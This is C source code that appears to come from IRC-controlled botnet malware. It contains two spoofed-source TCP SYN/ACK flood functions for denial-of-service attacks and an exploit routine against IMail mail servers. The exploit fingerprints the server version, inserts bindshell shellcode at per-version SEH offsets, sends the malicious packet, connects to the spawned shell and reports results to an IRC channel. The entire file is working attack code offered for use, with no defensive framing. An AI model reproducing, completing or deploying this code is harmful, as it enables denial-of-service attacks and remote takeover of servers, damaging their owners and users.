long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0)
return FALSE;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=fhtons((unsigned short)TargetPort);
addr_in.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons((unsigned short)TargetPort);
tcpHeader.sport=fhtons((unsigned short)rand()%1025);
tcpHeader.seq=fhtonl(0x12345678);
/* A SYN attack simply smash its target up with TCP SYN packets.
Each SYN packet needs a SYN-ACK response and forces the server to wait for
the good ACK in reply. Of course, we just never gives the ACK, since we use a
bad IP address (spoof) there's no chance of an ACK returning.
This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs.
When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs,
and that's the end of that server until the attack is cleared up.*/
if (strcmp(Type,"ddos.syn") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strcmp(Type,"ddos.ack") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strcmp(Type,"ddos.random") == 0) {
tcpHeader.ack_seq=rand()%3;
if (rand()%2 == 0)
tcpHeader.flags=SYN;
else
tcpHeader.flags=ACK;
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while(TRUE) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}
BOOL iMail( char *target, void* conn,EXINFO exinfo )
{
IRC* irc=(IRC*)conn;
char szBanner[512];//, szShellcode[512];
int iRemoteTarget;
int ibindsize=405;
SOCKET sSocket;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Beginning attack on %s",exinfo.ip);Sleep(1500);
SOCKADDR_IN sinSockAddrIn;
memset(&sinSockAddrIn, 0, sizeof(sinSockAddrIn));
sinSockAddrIn.sin_family = AF_INET;
sinSockAddrIn.sin_addr.s_addr = finet_addr(exinfo.ip);
sinSockAddrIn.sin_port = fhtons(exinfo.port);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Initializing IP and port for %s:%d",exinfo.ip,exinfo.port);Sleep(1500);
if(!(sSocket = fWSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL)))
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Creating Socket for %s",exinfo.ip);Sleep(1500);
if(fconnect(sSocket, (LPSOCKADDR)&sinSockAddrIn, sizeof(sinSockAddrIn)) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Connecting to socket for %s",exinfo.ip);Sleep(1500);
if(frecv(sSocket, szBanner, sizeof(szBanner), 0) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Getting Banner for %s",exinfo.ip);Sleep(1500);
if (strstr(szBanner,"IMail 7.04"))
iRemoteTarget = 0;
else if (strstr(szBanner,"IMail 7.05"))
iRemoteTarget = 1;
else if (strstr(szBanner,"IMail 7.06"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.07"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.10"))
iRemoteTarget = 3;
else if (strstr(szBanner,"IMail 7.11"))
iRemoteTarget = 4;
else if (strstr(szBanner,"IMail 7.12"))
iRemoteTarget = 5;
else if (strstr(szBanner,"IMail 7.13"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.14"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.15"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 8.00"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.01"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.02"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.03"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.04"))
iRemoteTarget = 8;
else if (strstr(szBanner,"IMail 8.05"))
iRemoteTarget = 9;
else if (strstr(szBanner,"IMail 8.10"))
iRemoteTarget = 10;
else if (strstr(szBanner,"IMail 8.11"))
iRemoteTarget = 12;
else if (strstr(szBanner,"IMail 8.12"))
iRemoteTarget = 13;
else if (strstr(szBanner,"IMail 8.13"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.14"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.15"))
iRemoteTarget = 15;
else
iRemoteTarget = -1;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Banner for %s is %s, iRemoteTarget is %d",exinfo.ip,szBanner,iRemoteTarget);Sleep(1500);
memcpy(szImailPacket + 12, bindshell, ibindsize -1);
if (iRemoteTarget == -1) return FALSE;
if (pImailTargets[iRemoteTarget].iSEHAddress == 0)
memcpy(szImailPacket + 700, &pImailTargets[iRemoteTarget].lOffset, 4);
else
if (pImailTargets[iRemoteTarget].iSEHAddress == 1)
memcpy(szImailPacket + 692, &pImailTargets[iRemoteTarget].lOffset, 4);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Crafting Malicious Packet for %s",exinfo.ip);Sleep(1500);
if(fsend(sSocket, szImailPacket, sizeof(szImailPacket), 0) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Malicious packet for %s sent",exinfo.ip);Sleep(1500);
fclosesocket(sSocket);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Socket Closed for %s",exinfo.ip);Sleep(1500);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
} else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
return FALSE;
}
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len)
{
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0)
return FALSE;
SOCKET sock;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(TargetPort);
ssin.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons(TargetPort);
tcpHeader.ack_seq=0;
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.flags=2;
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while (1) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}